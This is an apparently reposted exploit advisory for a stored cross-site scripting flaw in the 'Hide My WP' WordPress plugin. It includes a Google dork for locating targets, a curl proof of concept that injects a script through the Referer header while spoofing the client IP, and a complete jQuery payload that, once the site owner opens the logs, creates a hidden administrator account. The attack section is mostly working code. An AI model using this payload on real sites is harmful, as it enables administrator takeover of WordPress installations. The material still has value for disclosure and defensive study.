Nov 2, 2015
74 Views

[WP] Hide My WP XSS vulnerability

Written by

Exploit Title: Hide My WP XSS vulnerability
Date: 20-07-2015
Software Link: http://codecanyon.net/item/hide-my-wp-no-one-can-know-you-use-wordpress/4177158
Version 4.51.1
Google dork: ff957fea/includes/css/style.css
Fix: turn off IDS logging

Description

An attacker can make a fake attack attempt which will be logged, and can inject a javascript. The attacker also can spoof their IP in the logs.

Proof of Concept

curl –referer ‘<script src=”//….”> // () { :; };’ –header ‘X-FORWARDED-FOR: 8.8.8.8’ http://example.com

The site’s owner will get a notification about the fake attack attempt, when he checks it in the logs the included js will run. The attacker can create an admin user in the background with the example js below.

///Example js to create admin user:

jQuery(‘body’).prepend(‘<iframe id=”test” style=”position:absolute;top:-10000px” src=”/wp-admin/user-new.php”></iframe>’);
jQuery(‘#test’).load(function(){
jQuery(‘#test’).contents().find(‘#user_login’).val(‘pwned’);
jQuery(‘#test’).contents().find(‘#email’).val(’[email protected]’);

//Prevent browser prompt “remember password”
jQuery(‘#test’).contents().find(‘#pass1’).attr(‘type’,’text’);
jQuery(‘#test’).contents().find(‘#pass2’).attr(‘type’,’text’);

jQuery(‘#role’).val(‘administrator’);

jQuery(‘#test’).contents().find(‘#pass1’).val(‘dummypass’);
jQuery(‘#test’).contents().find(‘#pass2’).val(‘dummypass’);
jQuery(‘#test’).contents().find(‘#createuser’).submit();
});

Article Tags:
· · · · · · · · · · · · · · · ·
Article Categories:
Code/Web
    http://linholiver.com

    https://linholiver.com/diary/about/